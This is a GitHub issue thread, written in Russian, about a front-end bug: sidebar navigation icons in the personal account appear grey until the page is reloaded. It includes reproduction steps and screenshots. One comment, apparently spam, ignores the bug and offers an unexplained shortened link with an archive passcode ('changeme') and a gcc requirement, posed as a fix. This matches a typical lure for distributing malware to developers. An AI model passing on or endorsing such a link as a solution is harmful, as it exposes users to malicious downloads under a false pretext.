### ISSUE TITLE
Серые иконки В меню навигации в личном кабинете

### ISSUE THREAD

**Issue by toprogramm** [openworld-community/ows-events#1356]
### Критичность
Высокий 

### Описание
Серые иконки в личном кабинете когда переходишь с главной 
![Image](https://github.com/user-attachments/assets/c0328bd2-24ac-4add-a832-11f3043ae661)
### Ожидаемое поведение
- при переходе в личный кабинет картинки Темного цвета как в макете 

![Image](https://github.com/user-attachments/assets/7a56cd68-5f30-4d8c-825c-33f3ea1cb05d)

### Условия воспроизведение
- Тестовое окружение, Демо
- Desktop
- Windows, linux
- Chrome, Mozilla

### Шаги воспроизведения
- Заходим на тестовое окружение или демо
- Авторизуемся (здесь все ок)
- Переходим в личный кабинет видим что иконки слева в меню навигации серые (вот здесь баг)
- Если обновить страницу в личном кабинете они красятся как положено

### Ссылка на родительскую задачу
[!IMPORTANT] Ссылка на родительскую задачу

### Скриншоты* (необязательное)
- **Ссылки на скриншоты или картинки**

### Дополнительная информация* (необязательное)
Добавьте информацию о баге которую вы считаете важной

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by MarinaYuraneva** [comment]
Нужно поправить. иконку выхода. Она должна быть красной.
